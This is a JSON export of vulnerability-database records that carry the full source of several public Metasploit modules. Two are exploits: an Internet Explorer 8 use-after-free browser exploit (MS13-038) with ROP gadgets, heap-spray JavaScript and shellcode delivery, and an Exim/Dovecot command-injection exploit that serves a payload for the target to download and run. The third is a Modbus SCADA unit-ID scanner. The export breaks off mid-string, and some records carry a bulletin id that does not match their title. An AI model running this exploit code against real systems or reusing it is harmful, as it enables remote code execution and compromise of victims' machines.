"objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-17T14:37:10", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 71}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "6133ae6807eefa7e2bad99e0271a3911", "type": "metasploit", "bulletinFamily": "exploit", "title": "Modbus Unit ID and Station ID Enumerator", "description": "Modbus is a cleartext protocol used in common SCADA systems, developed originally as a serial-line (RS232) async protocol, and later transformed to IP, which is called ModbusTCP. default tcp port is 502. This module sends a command (0x04, read input register) to the modbus endpoint. If this command is sent to the correct unit-id, it returns with the same function-id. if not, it should be added 0x80, so that it sys 0x84, and an exception-code follows which do not interest us. This does not always happen, but at least the first 4 bytes in the return-packet should be exact the same as what was sent. You can change port, ip and the scan-range for unit-id. There is also added a value - BENICE - to make the scanner sleep a second or more between probes. We have seen installations where scanning too many too fast works like a DoS.\n", "published": "2012-10-28T14:11:10", "modified": "2017-08-27T01:01:10", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx", "http://en.wikipedia.org/wiki/Modbus:TCP"], "cvelist": [], "lastseen": "2019-06-20T02:39:29", "history": [], "viewCount": 118, "enchantments": {"score": {"value": 4.1, "vector": "NONE", "modified": "2019-06-20T02:39:29"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:1553"]}, {"type": "kitploit", "idList": ["KITPLOIT:7589415140458130624", "KITPLOIT:998955151150716619", "KITPLOIT:1781289439619762932"]}, {"type": "thn", "idList": ["THN:515CD17353FD69BC2811599574546F0A", "THN:9CC3E667EC316D78F27C05405A91663B"]}, {"type": "cisco", "idList": ["CISCO-SA-20190619-PSC-XSS", "CISCO-SA-20190619-IMC-CSRF"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1582-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994608"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153347", "PACKETSTORM:153348"]}, {"type": "exploitdb", "idList": ["EDB-ID:47010", "EDB-ID:47011"]}, {"type": "zdt", "idList": ["1337DAY-ID-32886", "1337DAY-ID-32887", "1337DAY-ID-32889"]}, {"type": "cve", "idList": ["CVE-2019-12133", "CVE-2017-8334"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4466-1:C0E23"]}], "modified": "2019-06-20T02:39:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/scada/modbus_findunitid.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Fuzzer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Modbus Unit ID and Station ID Enumerator',\n 'Description' => %q{\n Modbus is a cleartext protocol used in common SCADA systems, developed\n originally as a serial-line (RS232) async protocol, and later transformed\n to IP, which is called ModbusTCP. default tcp port is 502.\n\n This module sends a command (0x04, read input register) to the modbus endpoint.\n If this command is sent to the correct unit-id, it returns with the same function-id.\n if not, it should be added 0x80, so that it sys 0x84, and an exception-code follows\n which do not interest us. This does not always happen, but at least the first 4\n bytes in the return-packet should be exact the same as what was sent.\n\n You can change port, ip and the scan-range for unit-id. There is also added a\n value - BENICE - to make the scanner sleep a second or more between probes. We\n have seen installations where scanning too many too fast works like a DoS.\n },\n 'References' =>\n [\n [ 'URL', 'http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx' ],\n [ 'URL', 'http://en.wikipedia.org/wiki/Modbus:TCP' ]\n ],\n 'Author' => [ 'EsMnemon <esm[at]mnemonic.no>' ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Oct 28 2012'\n ))\n\n register_options(\n [\n Opt::RPORT(502),\n OptInt.new('UNIT_ID_FROM', [true, \"ModBus Unit Identifier scan from value [1..254]\", 1]),\n OptInt.new('UNIT_ID_TO', [true, \"ModBus Unit Identifier scan to value [UNIT_ID_FROM..254]\", 254]),\n OptInt.new('BENICE', [true, \"Seconds to sleep between StationID-probes, just for beeing nice\", 1]),\n OptInt.new('TIMEOUT', [true, 'Timeout for the network probe, 0 means no timeout', 2])\n ])\n end\n\n def run\n start=\"\\x21\\x00\\x00\\x00\\x00\\x06\"\n theend=\"\\x04\\x00\\x01\\x00\\x00\"\n noll=\"\\x00\"\n # between, \\01..\\0ff (1-255)\n unless (1..255).include? datastore['UNIT_ID_FROM']\n print_status(\"unit ID must be between 1 and 254 adjusting UNIT_ID_FROM to 1\")\n datastore['UNIT_ID_FROM']=1\n end\n\n unless (1..255).include? datastore['UNIT_ID_TO']\n print_status(\"Unit ID must be between #{datastore['UNIT_ID_FROM']} and 255\")\n print_warning(\"Adjusting UNIT_ID_TO to #{datastore['UNIT_ID_FROM']} \")\n datastore['UNIT_ID_TO'] = datastore['UNIT_ID_FROM']\n end\n\n if datastore['UNIT_ID_FROM'] > datastore['UNIT_ID_TO'] then\n print_warning(\"UNIT_ID_TO is less than UNIT_ID_FROM, setting them equal\")\n datastore['UNIT_ID_TO'] = datastore['UNIT_ID_FROM']\n end\n\n datastore['UNIT_ID_FROM'].upto(datastore['UNIT_ID_TO']) do |counter|\n sploit = start\n sploit += [counter].pack(\"C\")\n sploit += theend\n select(nil,nil,nil,datastore['BENICE'])\n connect()\n sock.put(sploit)\n\n data = sock.get_once(12, datastore['TIMEOUT'])\n if (data.nil?)\n data=noll+noll+noll+noll\n end\n\n if data[0,4] == \"\\x21\\x00\\x00\\x00\" #return of the same trans-id+proto-id\n print_good(\"Received: correct MODBUS/TCP from stationID #{counter}\")\n else\n print_status(\"Received: incorrect/none data from stationID #{counter} (probably not in use)\")\n end\n\n disconnect()\n end\n end\nend\n\n\n=begin\nFor testing purposes:\n\n This client is developed and tested against a SAIA PCD1.M2 system\n http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx\n and a modbus/tcp PLC simulator from plcsimulator.org\n and the Modbus SLAVE from http://www.modbustools.com/\n\n Mission is to find Unit-ID/stationID of the modbus-endpoint:\n RHOST=IP of the modbus-service (PLC)\n RPORT=Usually 502\n=end\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-20T02:39:29", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 72}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "f78b81be9ef5cef8ddee187a9e7948cc", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.\n", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL"], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-06-20T04:32:45", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 9.5, "vector": "NONE", "modified": "2019-06-20T04:32:45"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-59162", "SMNTC-58238", "SMNTC-50218", "SMNTC-38195"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "saint", "idList": ["SAINT:3EF0C66878E70BB3C355385365B1DFBF", "SAINT:530FA87FA097C35D9629E058CE3C1589", "SAINT:ADB3400FCF70345A44024ACACFAE55FE"]}, {"type": "threatpost", "idList": ["THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C"]}, {"type": "nessus", "idList": ["SMB_NT_MS13-038.NASL", "SMB_KB2847140.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803395", "OPENVAS:803395"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-06-20T04:32:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-20T04:32:45", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 73}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "7624a58d730795e2d58bd9e3f4c0bc73", "type": "metasploit", "bulletinFamily": "exploit", "title": "Exim and Dovecot Insecure Configuration Command Injection", "description": "This module exploits a command injection vulnerability against Dovecot with Exim using the \"use_shell\" option. It uses the sender's address to inject arbitrary commands, since this is one of the user-controlled variables. It has been successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common packages.\n", "published": "2013-06-07T22:59:04", "modified": "2017-08-29T00:17:58", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://www.redteam-pentesting.de/advisories/rt-sa-2013-001"], "cvelist": [], "lastseen": "2019-06-22T11:24:28", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 2.9, "vector": "NONE", "modified": "2019-06-22T11:24:28"}, "dependencies": {"references": [{"type": "pentestit", "idList": ["PENTESTIT:1AAC783D12EC0DEC62A646645FD17A24"]}, {"type": "kitploit", "idList": ["KITPLOIT:1109254743703769798", "KITPLOIT:6597521316011669583"]}, {"type": "threatpost", "idList": ["THREATPOST:C47F49D9725508ED836D7FCD6D957077", "THREATPOST:2DDB1918554F258230A7F9D56F220D8F", "THREATPOST:BA5F8412B5B698E2CD2642F255B022AC", "THREATPOST:A02178C7680BBF92849A8E5B4ACDD06A"]}, {"type": "thn", "idList": ["THN:D4CF405E96E0712654FF2AD7347571B1", "THN:35E9D75A3F6252B550F37910B4C0335A", "THN:3740262E7693548F88688CB1EEDC492A", "THN:20A9EF5BF96A4D0377CA2D6F796E268C"]}, {"type": "cve", "idList": ["CVE-2019-12572"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:36F3CC3E249355A592453C791E236092"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1D06BFD312BC44ABE7F47110F4BFA29C", "TALOSBLOG:688BE6618140B4A2CFD5100D561798BE"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4468-1:3B1FA"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:9377"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994644"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310141281"]}, {"type": "exploitdb", "idList": ["EDB-ID:47019"]}], "modified": "2019-06-22T11:24:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/smtp/exim4_dovecot_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Smtp\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Exim and Dovecot Insecure Configuration Command Injection',\n 'Description' => %q{\n This module exploits a command injection vulnerability against Dovecot with\n Exim using the \"use_shell\" option. It uses the sender's address to inject arbitrary\n commands, since this is one of the user-controlled variables. It has been\n successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common\n packages.\n },\n 'Author' =>\n [\n 'Unknown', # From redteam-pentesting # Vulnerability Discovery and PoC\n 'eKKiM', # PoC\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '93004' ],\n [ 'EDB', '25297' ],\n [ 'URL', 'https://www.redteam-pentesting.de/advisories/rt-sa-2013-001' ]\n ],\n 'Privileged' => false,\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux',\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'Linux x86', { }],\n ],\n 'DisclosureDate' => 'May 03 2013',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('EHLO', [ true, 'TO address of the e-mail', 'debian.localdomain']),\n OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'root@debian.localdomain']),\n OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),\n OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 80 ]),\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])\n ])\n\n register_advanced_options(\n [\n OptBool.new(\"SkipVersionCheck\", [false, \"Specify this to skip the version check\", false])\n ])\n\n deregister_options('MAILFROM')\n end\n\n # wait for the data to be sent\n def wait_linux_payload\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...\")\n\n waited = 0\n while (not @elf_sent)\n select(nil, nil, nil, 1)\n waited += 1\n if (waited > datastore['HTTP_DELAY'])\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\n end\n end\n end\n\n # Handle incoming requests from the server\n def on_request_uri(cli, request)\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @elf_sent = true\n send_response(cli, @pl)\n end\n\n def exploit\n\n @pl = generate_payload_exe\n @elf_sent = false\n\n #\n # start our web server to deploy the final payload\n #\n downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))\n resource_uri = '/' + downfile\n\n if (datastore['DOWNHOST'])\n service_url_payload = datastore['DOWNHOST'] + resource_uri\n else\n\n # Needs to be on the port 80\n if datastore['SRVPORT'].to_i != 80\n fail_with(Failure::Unknown, 'The Web Server needs to live on SRVPORT=80')\n end\n\n #do not use SSL\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n #we use SRVHOST as download IP for the coming wget command.\n #SRVHOST needs a real IP address of our download host\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\n service_url_payload = srv_host + resource_uri\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n\n datastore['SSL'] = true if ssl_restore\n end\n\n\n connect\n\n print_status(\"#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}\")\n if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim /\n disconnect\n fail_with(Failure::NoTarget, \"#{rhost}:#{rport} - The target server is not running 